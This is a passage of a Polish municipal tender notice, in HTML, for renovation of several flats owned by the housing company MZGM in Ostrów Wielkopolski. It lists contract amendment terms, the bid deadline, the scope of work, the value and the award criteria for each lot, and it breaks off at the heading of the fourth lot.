              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1. W przypadkach przewidzianych w umowie dopuszcza się wprowadzenie zmian za zgodą stron umowy. 
2. Zmiany mogą być inicjowane przez Zamawiającego lub przez Wykonawcę. 
3. Dopuszczalne jest dokonanie zmian umowy: 
1) jeżeli zmiana umowy będzie korzystna dla Zamawiającego i w szczególności dotyczyć będzie: 
a) zmiany technologii wykonawstwa w stosunku do przewidzianej w dokumentacji projektowej, 
b) zamiany materiałów przewidzianych do wykonania robót w stosunku do materiałów przewidzianych w dokumentacji projektowej, 
c) polegające na zmianie danych Wykonawcy bez zmiany samego Wykonawcy (np. zmiana siedziby, adresu,),
d) obniżenie wynagrodzenia Wykonawcy przy zachowaniu zakresu jego świadczenia umownego,
e) dotyczące świadczenia Wykonawcy na lepszej jakości przy zachowaniu tożsamości przedmiotu zamówienia,
f) innych nie wymienionych zmian korzystnych dla Zamawiającego, 

2) jeżeli zmiana umowy dotyczyć zmiany technologii wykonawstwa w stosunku do przewidzianej w dokumentacji projektowej lub zamiany materiałów przewidzianych do wykonania robót w stosunku do materiałów przewidzianych w dokumentacji projektowej, 
3) jeżeli zmiana umowy dotyczyć będzie zmiany kierownika budowy lub innych osób wskazanych w umowie, z tym że zmiana osób po stronie Wykonawcy (wskazanych w ofercie jako odpowiedzialnych za realizację zamówienia) wymaga pisemnej zgody Zamawiającego, a Zamawiający przed jej udzieleniem domagał się będzie od Wykonawcy dokumentów potwierdzających spełnianie przez te osoby warunków ubiegania się o udzielenie zamówienia określonych w SIWZ dotyczącej postępowania w wyniku którego niniejsza umowa została zawarta.
4. Jeżeli zmiana umowy wymaga zmiany dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót budowlanych, strona inicjująca zmianę przedstawi: 
1) projekt zamienny zawierający opis proponowanej zmiany wraz z informacją o konieczności zmiany pozwolenia na budowę, 
2) przedmiar i niezbędne rysunki. 
5. Do każdej propozycji zmiany, inicjujący zmianę przedstawi: 
1) opis propozycji zmiany, w tym wpływ na terminy wykonania, 
2) uzasadnienie zmiany, 
3) obliczenia uzasadniające ewentualną zmianę wynagrodzenia
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 17-03-2017, godzina: 08:15,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              pl<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Wykonanie remontów w branży ogólnobudowlanej w budynkach będących w zasobach Miejskiego Zakładu Gospodarki Mieszkaniowej Sp. z o. o. w Ostrowie Wielkopolskim: ul. Prof. Kaliny 45/3; ul. Zielona 2/10; ul. Zielona 6/2; ul. Zielona 6/4, ul. Spokojna 8/13;<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część nr 1. : wykonanie remontu lokali socjalnych  będących w zasobach MZGM  Spółka z o.o w Ostrowie Wielkopolskim :
1.1.Remont lokalu socjalnego przy ul. Profesora Kaliny 45/3 będącego w zasobach MZGM Spółka z o.o.  w Ostrowie Wielkopolskim w zakresie prac obejmujących m.in.  :                                  - zeskrobanie ścian z łuszczącej się farby, oczyszczenie szczotka powierzchni tynku z kurzu i pyłu, skucie zmurszałych tynków wraz z wykonaniem nowych w II kategorii,                                   - zagruntowanie ścian i sufitów preparatem wzmacniającym struktury tynku np. Ceresit, Atlas,                    
- jednokrotne wykonanie wewnętrznych gładzi gipsowych na ścianach i sufitach,                                                   
- dwukrotne malowanie farbą emulsyjną ścian i sufitów,
 - dwukrotne malowanie farbą olejną ścian, lamperia kuchni i pomieszczenia w-c,
 - demontaż starych wykładzin podłogowych, położenie nowych wykładzin podłogowych PCV o gr.
min: 2,5 mm w kolorze jasno brązowym w pomieszczeniach pokoi, kuchni, przedpokoju i pomieszczenia w-c, listew przyściennych z polichlorku winylu- w pomieszczeniach pokoi, kuchni, przedpokoju i pomieszczenia w-c,
- montaż 5 szt. nowych okien, okna z PCV w kolorze białym z profili min. 5  komorowych jako uchylno - rozwierne. Szyby zespolone 4/16/4 o współczynniku przenikania ciepła max U=1,1 W/m? K. Okucia zapewniające regulację za pomocą kluczy imbusowych. Okna winny mieć możliwość stałego przewietrzania pomieszczeń (mikrowentylacja).Wymiana parapetów zewnętrznych na stalowe powlekane w kolorze brązowym, wewnętrznych na wykonane z PCV. Zabudowane materiały powinny posiadać atest PZH, deklarację zgodności z aprobatą techniczną lub normą zharmonizowana wraz z aktualnymi badaniami,
- demontaż drzwi wejściowych do lokalu wraz z zamontowaniem nowej ościeżnicy regulowanej, progu, skrzydła drzwiowego metalowego powlekanego z przekładka termiczna wraz z osprzętem, drzwi w świetle przejścia nie mniej niż 90 cm. Zabudowane materiały powinny posiadać atest PZH, deklarację zgodności z aprobatą techniczną lub normą zharmonizowana wraz z aktualnymi badaniami,  zamurowanie i otynkowanie wraz z pomalowaniem otworu drzwiowego,
- wykucie starych drzwi wewnętrznych wraz z montażem ościeżnic i nowych drzwi wewnętrznych płytowych,
- wywóz i utylizacja gruzu, zgromadzonych w pomieszczeniach rzeczy wraz z wykonaniem prac porządkowych w lokalu.

1.2.Remont lokalu socjalnego przy ul. Spokojna 8/13 będącego w zasobach MZGM Spółka               z o.o.  w Ostrowie Wielkopolskim w zakresie prac obejmujących m.in.  :
- zeskrobanie ścian z łuszczącej się farby, oczyszczenie szczotka powierzchni tynku z kurzu i pyłu, skucie zmurszałych tynków wraz z wykonaniem nowych w II kategorii,
- zagruntowanie ścian i sufitów preparatem wzmacniającym struktury tynku np. Ceresit, Atlas,                      
- jednokrotne wykonanie wewnętrznych gładzi gipsowych na ścianach i sufitach,
- dwukrotne malowanie farbą emulsyjną ścian i sufitów,
- dwukrotne malowanie farbą olejną ścian, lamperii w  kuchni,
- demontaż starych wykładzin podłogowych, położenie nowych wykładzin podłogowych PCV o gr. min: 2,5 mm w kolorze jasno brązowym w  pokoju, kuchni, przedpokoju, listew przyściennych z polichlorku winylu- w  pokoju, kuchni, przedpokoju , - wykucie 1 szt. starych drzwi wewnętrznych wraz z montażem ościeżnic i nowych drzwi wewnętrznych płytowych,
- oczyszczenie drzwi wewnętrznych ze starej farby, dwukrotne dwustronne malowanie  farbą olejną z dwukrotnym szpachlowaniem,
- demontaż starych przewodów podtynkowych, oraz  puszek podtynkowych
- wykucie bruzd pod przewody i puszki elektryczne  oraz ułożenie przewodów elektrycznych i puszek instalacyjnych podtynkowych
- zamurowanie i zatynkowanie bruzd w których ułożono przewody elektryczne
- łączenie przewodów w puszkach elektrycznych oraz montaż osprzętu elektrycznego
- wywóz i utylizacja gruzu, zgromadzonych w pomieszczeniach rzeczy wraz z wykonaniem praz porządkowych w lokalu.

1.3.Remont lokalu socjalnego przy ul. Zielona 6/2 będącego w zasobach MZGM Spółka z o.o.  w Ostrowie Wielkopolskim w zakresie prac obejmujących m.in.  :                                                  - zeskrobanie ścian z łuszczącej się farby, oczyszczenie szczotka powierzchni tynku z kurzu i pyłu, skucie zmurszałych tynków wraz z wykonaniem nowych w II kategorii,                                   - zagruntowanie ścian i sufitów preparatem wzmacniającym struktury tynku np. Ceresit, Atlas,   
- jednokrotne wykonanie wewnętrznych gładzi gipsowych na ścianach i sufitach,  
- dwukrotne malowanie farbą emulsyjną ścian i sufitów,
- dwukrotne malowanie farbą olejną ścian, lamperia kuchni i pomieszczeniu w-c,
- demontaż starych wykładzin podłogowych, położenie nowych wykładzin podłogowych PCV o gr.
min: 2,5 mm w kolorze jasno brązowym w pomieszczeniach pokoi, kuchni,  pomieszczenia w-c, listew przyściennych z polichlorku winylu- w pomieszczeniach pokoi, kuchni i pomieszczenia w-c,
- wykucie 3 szt. starych drzwi wewnętrznych wraz z montażem ościeżnic i nowych drzwi wewnętrznych płytowych,
- demontaż starej instalacji wodno - kanalizacyjnej
- wykonanie rozkuć i bruzd pod  nową instalację wodno - kanalizacyjną
- wykonanie nowej instalacji wodociągowej z rur PP  i instalacji odpływowej z rur PCV                        
- zamurowanie i zatynkowanie rozkuć i bruzd po robotach instalatorskich
- wykonanie instalacji i montaż wodomierza zw
- montaż armatury sanitarnej w pomieszczeniu w-c  (komplet ustępowy, komplet natryskowy, komplet umywalkowy)
- montaż bojlera elektrycznego 40L w łazience
- montaż baterii zlewozmywakowej i zlewozmywaka w kuchni
- wywóz i utylizacja gruzu, zgromadzonych w pomieszczeniach rzeczy wraz z wykonaniem praz porządkowych w lokalu.

1.4.Remont lokalu socjalnego przy ul. Zielonej 6/4 będącego w zasobach MZGM Spółka z o.o.  w Ostrowie Wielkopolskim w zakresie prac obejmujących m.in.  :                                                 - zeskrobanie ścian z łuszczącej się farby, oczyszczenie szczotka powierzchni tynku z kurzu i pyłu, skucie zmurszałych tynków wraz z wykonaniem nowych w II kategorii,                                   - zagruntowanie ścian i sufitów preparatem wzmacniającym struktury tynku np. Ceresit, Atlas,       
- jednokrotne wykonanie wewnętrznych gładzi gipsowych na ścianach i sufitach,                                     
- dwukrotne malowanie farbą emulsyjną ścian i sufitów,
- skucie płytek ceramicznych ze ścian i posadzce w łazience
 - dwukrotne malowanie farbą olejną ścian, lamperia w łazience
 - demontaż starych wykładzin podłogowych, położenie nowych wykładzin podłogowych PCV o gr.
min: 2,5 mm w kolorze jasno brązowym w  pokoju, kuchni  i łazience, listew przyściennych z polichlorku winylu- w  pokoju, kuchni i łazience,
- oczyszczenie drzwi wewnętrznych i zewnętrznych ze starej farby, dwukrotne, dwustronne malowanie drzwi farbą olejną z dwukrotnym szpachlowaniem,
- demontaż starej instalacji wodno - kanalizacyjnej
- wykonanie rozkuć i bruzd pod  nową instalację wodno - kanalizacyjną
- wykonanie nowej instalacji wodociągowej z rur PP  i instalacji odpływowej z rur PCV
- zamurowanie i zatynkowanie rozkuć i bruzd po robotach instalatorskich
- wykonanie instalacji i montaż wodomierza zw
- montaż bojlera elektrycznego 40L w łazience
- montaż armatury sanitarnej w pomieszczeniu w łazience (komplet ustępowy, komplet natryskowy, komplet umywalkowy)
- montaż baterii zlewozmywakowej i zlewozmywaka w kuchni
- wywóz i utylizacja gruzu, zgromadzonych w pomieszczeniach rzeczy wraz z wykonaniem praz porządkowych w lokalu.- wywóz i utylizacja gruzu, zgromadzonych w pomieszczeniach rzeczy wraz z wykonaniem praz porządkowych w lokalu.

1.5.Remont lokalu socjalnego przy ul. Zielonej 2/10 będącego w zasobach MZGM Spółka z o.o.  w Ostrowie Wielkopolskim w zakresie prac obejmujących m.in.  :                                               - zeskrobanie ścian z łuszczącej się farby, oczyszczenie szczotka powierzchni tynku z kurzu i pyłu, skucie zmurszałych tynków wraz z wykonaniem nowych w II kategorii,                                   - zagruntowanie ścian i sufitów preparatem wzmacniającym struktury tynku np. Ceresit, Atlas,               
- jednokrotne wykonanie wewnętrznych gładzi gipsowych na ścianach i sufitach,          
- dwukrotne malowanie farbą emulsyjną ścian i sufitów,
- położenie nowych wykładzin podłogowych PCV o gr. min: 2,5 mm w kolorze jasno brązowym w pokoju, aneksie kuchennym, przedpokoju oraz listew przyściennych z polichlorku winylu w pokoju, aneksie kuchennym, przedpokoju,
- oczyszczenie drzwi wewnętrznych ze starej farby, dwukrotne, dwustronne malowanie drzwi farbą olejną z dwukrotnym szpachlowaniem,
- wywóz i utylizacja gruzu, zgromadzonych w pomieszczeniach rzeczy wraz z wykonaniem prac porządkowych w lokalu.
 <br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45210000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  49355.78<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 30<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Okres gwarancji i rękojmi</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Wykonanie remontów w branży ogólnobudowlanej w budynkach będących w zasobach Miejskiego Zakładu Gospodarki Mieszkaniowej Sp. z o. o. w Ostrowie Wielkopolskim: ul. Wolności 5/22; ul. Wolności 3/13; Wolności 3/15; <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część nr 2: Wykonanie remontu lokali mieszkalnych  będących w zasobach MZGM Sp. z o.o.  w Ostrowie Wlkp.:

2.1. Remont lokalu mieszkalnego przy ul. Wolności 3/13 będącego w zasobach MZGM Sp. z o.o. w Ostrowie Wlkp. w zakresie prac obejmującym m.in.:
- zeskrobaniu ścian z łuszczącej się farby, oczyszczeniu szczotką powierzchni tynku z kurzu i pyłu, skucie zmurszałych tynków,
- zerwanie boazerii,
- zerwanie starych tapet,
- rozebranie posadzki z płytek na zaprawie cementowej,
- rozebranie oblicowania ścian - skucie glazury,
- zagruntowaniu ścian i sufitów preparatem wzmacniającym strukturę tynku- np: Ceresit, Atlas, Knauf,
- ochrona narożników wypukłych kątownikiem metalowym, 
- jednokrotne wykonanie wewnętrznych gładzi gipsowych na ścianach i sufitach,
- dwukrotne malowanie farbą emulsyjną ścian i sufitów,
- dwukrotne malowanie ścian farbą olejna - lamperia,
- wymiana lub naprawa ewentualnych uszkodzeń w stolarce drzwiowej (drzwi wewnętrzne i zewnętrzne),
- oczyszczeniu drzwi wewnętrznych ze starej farby, dwukrotne dwustronne malowanie drzwi farbą olejną z dwukrotnym szpachlowaniem,
- dwukrotne malowanie farbą olejną grzejników i rur instalacji c.o.
- demontaż starych wykładzin podłogowych, położenie nowych wykładzin PCV o gr. min: 2,5 mm w kolorze jasno brązowym w pomieszczeniach  kuchni, łazience z WC, położenie listew przyściennych z polichlorku winylu - kuchnia, ubikacja, korytarz,
- położenie paneli podłogowych laminowanych w klasie ścieralności AC 3, o grubości 7 mm, powierzchnia-struktura drewna, materiał nośny HDF, sposób montażu - pływający, bezklejowy, na podkładzie, położenie listew wykańczających  z MDF- pokoje,
- rozbiórka pieców w pokojach,
- wywóz i utylizacja gruzu, zgromadzonych w pomieszczeniach rzeczy wraz z wykonaniem prac porządkowych w lokalu,
- wymiana instalacji elektrycznej w lokalu na nową - wykucie starej instalacji, położenie nowej wraz z puszkami instalacyjnymi, łącznikami, gniazdami,
- wykonanie nowej instalacji centralnego ogrzewania z rur miedzianych, wraz z zamontowaniem grzejników, zaworów termostatycznych, głowic, zaworów powrotnych, odpowietrzników,
- wykonanie próby szczelności instalacji c.o., sprawdzenie działania podczas próby na gorąco z dokonaniem regulacji, 
- wykonanie izolacji rurociągów,
- wykonanie nowej instalacji gazowej - demontaż starej instalacji, wykonanie nowej z rur miedzianych, montaż kurka gazowego, próba szczelności instalacji, montaż nowej kuchni gazowej ze złączem elastycznym z piekarnikiem,
- wymiana na nowe: baterii umywalkowej, baterii wannowej, ustępu z miską porcelanową, zlewozmywaka blaszanego, umywalki porcelanowej ze wspornikami i syfonem, wanny stalowej emaliowanej lub tworzywa sztucznego, 
2.2. Remont lokalu mieszkalnego przy ul. Wolności 3/15 będącego w zasobach MZGM Sp. z o.o. w Ostrowie Wlkp. w zakresie prac obejmującym m.in.:
- zeskrobaniu ścian z łuszczącej się farby, oczyszczeniu szczotką powierzchni tynku z kurzu i pyłu, skucie zmurszałych tynków,
- wykonanie warstw wyrównawczych pod posadzki,
- wykonanie ocieplenia ścian budynku płytami styropianowymi,
- rozebranie posadzki z płytek na zaprawie cementowej,
- rozebranie oblicowania ścian - skucie glazury,
- zagruntowaniu ścian i sufitów preparatem wzmacniającym strukturę tynku- np: Ceresit, Atlas, Knauf,
- ochrona narożników wypukłych kątownikiem metalowym, 
- jednokrotne wykonanie wewnętrznych gładzi gipsowych na ścianach i sufitach,
- dwukrotne malowanie farbą emulsyjną ścian i sufitów,
- dwukrotne malowanie ścian farbą olejna - lamperia,
- wymiana lub naprawa ewentualnych uszkodzeń w stolarce drzwiowej (drzwi wewnętrzne i zewnętrzne),
- demontaż starych wykładzin podłogowych, położenie nowych wykładzin PCV o gr. min: 2,5 mm w kolorze jasno brązowym w pomieszczeniach  kuchni, łazience z WC, położenie listew przyściennych z polichlorku winylu,
- demontaż drzwi wejściowych do lokalu wraz z zamontowaniem nowej ościeżnicy regulowanej, 
progu, skrzydła drzwiowego metalowego powlekanego z przekładką termiczną wraz z osprzętem, 
drzwi w świetle przejścia nie mniej niż 80 cm. Zabudowane materiały powinny posiadać atest 
PZH, deklarację zgodności z aprobatą techniczną lub normą zharmonizowaną wraz z aktualnymi 
badaniami, zamurowanie i otynkowanie wraz z pomalowaniem otworu drzwiowego, 
- wykucie starych drzwi wewnętrznych pokojowych i łazienkowych wraz z z montażem ościeżnic i nowych drzwi wewnętrznych płytowych,
- montaż nowych okien - okna wykonać z PCW w kolorze białym z profili min. 5 komorowych jako uchylno-rozwierne. Szyby zespolone 4/16/4 o współczynniku przenikania ciepła max U=1,1 W/m2K. Okucia zapewniające regulację za pomocą kluczy imbusowych. Okna winny mieć możliwość stałego przewietrzania pomieszczeń (mikrowentylacja). Wymiana parapetów zewnętrznych na stalowe powlekane w kolorze brązowym, wewnętrznych na wykonane z PCV. Zabudowane materiały powinny posiadać atest PZH, deklarację zgodności z aprobatą techniczną lub normą zharmonizowaną wraz z aktualnymi badaniami,
- wykonanie obróbek przy dwóch oknach - zewnętrznych  oraz wewnętrznych z płyt G-K,
- wywóz i utylizacja gruzu, zgromadzonych w pomieszczeniach rzeczy wraz z wykonaniem prac porządkowych w lokalu,
- wydzielenie łazienki, wykonanie izolacji przeciwwilgociowych folia półpłynną, wykonanie posadzki z płytek ceramicznych 30x30 cm, wykonanie ścian działowych z płyt gipsowych na rusztach metalowych z pokryciem obustronnym jednowarstwowo, licowanie  ścian płytkami o wymiarach 20x25 cm, malowanie wykonanych ścian i sufitu farbą emulsyjną, montaż drzwi wejściowych łazienkowych, wykonanie instalacji elektrycznej wraz z montażem opraw oświetleniowych, łączników, gniazd wtyczkowych, wykonanie pomiarów nowej instalacji elektrycznej wraz z protokołami,     
- wymiana instalacji elektrycznej w lokalu na nową - wykucie starej instalacji, położenie nowej wraz z puszkami instalacyjnymi, łącznikami, gniazdami,
- wykonanie nowej instalacji centralnego ogrzewania z rur miedzianych, wraz z zamontowaniem grzejników, zaworów termostatycznych, głowic, zaworów powrotnych, odpowietrzników,
- wykonanie próby szczelności instalacji c.o., sprawdzenie działania podczas próby na gorąco z dokonaniem regulacji, 
- wykonanie izolacji rurociągów,
- wykonanie nowej instalacji gazowej - demontaż starej instalacji, wykonanie nowej z rur miedzianych, montaż kurka gazowego, próba szczelności instalacji, montaż nowej kuchni gazowej ze złączem elastycznym z piekarnikiem,
- wymiana na nowe: baterii umywalkowej, baterii wannowej, ustępu z miską porcelanową, zlewozmywaka blaszanego, umywalki porcelanowej ze wspornikami i syfonem, wanny stalowej emaliowanej lub tworzywa sztucznego,       
2.3. Remont lokalu mieszkalnego przy ul. Wolności 5/22 będącego w zasobach MZGM Sp. z o.o. w Ostrowie Wlkp. w zakresie prac obejmującym m.in.:
- zeskrobaniu ścian z łuszczącej się farby, oczyszczeniu szczotką powierzchni tynku z kurzu i pyłu, skucie zmurszałych tynków,
- zerwanie starych tapet,
- ochrona narożników wypukłych kątownikiem metalowym,
- zagruntowaniu ścian i sufitów preparatem wzmacniającym strukturę tynku- np: Ceresie, Atlas, Knauf, 
- jednokrotne wykonanie wewnętrznych gładzi gipsowych na ścianach i sufitach, 
- dwukrotne malowanie farbą emulsyjną ścian i sufitów,
- dwukrotne malowanie  ścian farbą olejną - lamperia,
- wymiana lub naprawa ewentualnych uszkodzeń w stolarce drzwiowej (drzwi wewnętrzne i zewnętrzne),
- oczyszczeniu drzwi wewnętrznych i zewnętrznych ze starej farby, dwukrotne dwustronne malowanie drzwi farbą olejną, z dwukrotnym szpachlowaniem,
- dwukrotne malowanie farbą olejną grzejników i rur instalacji c.o.
- demontaż starych wykładzin podłogowych, położenie nowych wykładzin PCV o gr. min: 2,5 mm w kolorze jasno brązowym w pomieszczeniach, położenie listew przyściennych z polichlorku winylu,
- montaż nowych okien - okna wykonać z PCW w kolorze białym z profili min. 5 komorowych jako uchylno-rozwierne. Szyby zespolone 4/16/4 o współczynniku przenikania ciepła max U=1,1 W/m2K. Okucia zapewniające regulację za pomocą kluczy imbusowych. Okna winny mieć możliwość stałego przewietrzania pomieszczeń (mikrowentylacja). Wymiana parapetów zewnętrznych na stalowe powlekane w kolorze brązowym, wewnętrznych na wykonane z PCV. Zabudowane materiały powinny posiadać atest PZH, deklarację zgodności z aprobatą techniczną lub normą zharmonizowaną wraz z aktualnymi badaniami,
- wykonanie obróbek przy dwóch oknach - zewnętrznych  oraz wewnętrznych z płyt G-K,
- wywóz i utylizacja gruzu, zgromadzonych w pomieszczeniach rzeczy wraz z wykonaniem prac porządkowych w lokalu, <br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45210000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  65406.83<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 30<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Okres gwarancji i rękojmi</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Wykonanie remontów w branży ogólnobudowlanej w budynkach będących w zasobach Miejskiego Zakładu Gospodarki Mieszkaniowej Sp. z o. o. w Ostrowie Wielkopolskim: ul. Wrocławska 25/10; ul. Wrocławska 128/11<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część nr 3. : wykonanie remontu lokali komunalnych   będących w zasobach MZGM  Spółka  z o.o w Ostrowie Wielkopolskim :
3.1.Remont lokalu komunalnego  przy ul. Wrocławskiej 25/10  będącego w zasobach MZGM Spółka z o.o.  w Ostrowie Wielkopolskim w zakresie prac obejmujących m.in.  :                             - demontaż drzwi na I korytarzu i zabezpieczenie otworu wełną mineralną
 oraz płytą  kartonowo - gipsową
- zeskrobanie ścian z łuszczącej się farby, oczyszczenie szczotką powierzchni tynku z kurzu i pyłu, skucie zmurszałych tynków wraz z wykonaniem nowych w II kategorii,                                   - zagruntowanie ścian i sufitów preparatem wzmacniającym struktury tynku np. Ceresit, Atlas,  
- jednokrotne wykonanie wewnętrznych gładzi gipsowych na ścianach i sufitach,   
- dwukrotne malowanie farbą emulsyjną ścian i sufitów,
- demontaż starych wykładzin podłogowych, położenie nowych wykładzin podłogowych PCV o gr.
min: 2,5 mm w kolorze jasno brązowym na korytarzu, listew przyściennych z polichlorku winylu
- wywóz i utylizacja gruzu, zgromadzonych w pomieszczeniach rzeczy wraz z wykonaniem prac porządkowych w lokalu.

3.2.Remont lokalu komunalnego przy ul. Wrocławskiej 128/11 będącego w zasobach MZGM Spółka z o.o.  w Ostrowie Wielkopolskim w zakresie prac obejmujących m.in.  :
- zeskrobanie ścian z łuszczącej się farby i płyt styropianowych, oczyszczenie szczotką powierzchni tynku z kurzu i pyłu, skucie zmurszałych tynków wraz z wykonaniem nowych w II kategorii,
- zagruntowanie ścian i sufitów preparatem wzmacniającym struktury tynku np. Ceresit, Atlas,                      
- jednokrotne wykonanie wewnętrznych gładzi gipsowych na ścianach i sufitach,
- dwukrotne malowanie farbą emulsyjną ścian i sufitów,
- dwukrotne malowanie farbą olejną ścian, lamperii w  kuchni  
- demontaż starych wykładzin podłogowych, położenie nowych wykładzin podłogowych PCV o gr. min: 2,5 mm w kolorze jasno brązowym w  pokoju, kuchni i na korytarzu, listew przyściennych z polichlorku winylu- w  pokoju, kuchni oraz na korytarzu,
- oczyszczenie drzwi wewnętrznych ze starej farby, dwukrotne dwustronne malowanie  farbą olejną z dwukrotnym szpachlowaniem,
- demontaż starych przewodów podtynkowych, oraz  puszek podtynkowych,
- wykucie bruzd pod przewody i puszki elektryczne  oraz ułożenie przewodów elektrycznych i puszek instalacyjnych podtynkowych,
- zamurowanie i zatynkowanie bruzd w których ułożono przewody elektryczne,
- łączenie przewodów w puszkach elektrycznych oraz montaż osprzętu elektrycznego,
wydzielenie pomieszczenia łazienki z kuchni
- wykonanie ścianek działowych łazienki z płyt kartonowo - gipsowych,
- montaż drzwi łazienkowych,
- wykucie bruzd pod przewody i puszki elektryczne  oraz ułożenie przewodów elektrycznych i puszek instalacyjnych podtynkowych,
- zamurowanie i zatynkowanie bruzd w których ułożono przewody elektryczne,
- łączenie przewodów w puszkach elektrycznych oraz montaż osprzętu elektrycznego,
- wykonanie przekuć i bruzd pod wymianę pionu kanalizacyjnego oraz wykonanie podejść odpływowych  do urządzeń sanitarnych w łazience i zlewozmywaka w kuchni,
- montaż instalacji kanalizacyjnej  z rur PCV i zamurowanie oraz zatynkowanie bruzd i rozkuć
po robotach instalatorskich,
- wykonanie przekuć i bruzd pod nową instalację wodociągową,  
- wykonanie nowej  instalacji wodociągowej z rur PP w kuchni i łazience lokalu  oraz zatynkowanie bruzd i rozkuć po robotach instalatorskich,   
- wykonanie instalacji  i montaż wodomierza,
- położenie płytek ceramicznych na ścianach na wysokość 150cm  i posadzce łazienki,
- montaż armatury sanitarnej ( komplet ustępowy, wanna, umywalka ) w łazience i zlewozmywaka w kuchni  oraz bojlera elektrycznego 40l,                  
- wywóz i utylizacja gruzu, zgromadzonych w pomieszczeniach rzeczy wraz z wykonaniem praz porządkowych w lokalu. <br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45210000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  17628.87<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 30<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Okres gwarancji i rękojmi</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>Wykonanie remontów w branży ogólnobudowlanej w budynkach będących w zasobach Miejskiego Zakładu Gospodarki Mieszkaniowej Sp. z o. o. w Ostrowie Wielkopolskim: ul. Wolności 22/14a; ul. Wrocławska 25 m3a; ul. Wrocławska 148/3<br /><div style="padding-left: 20px"><b>
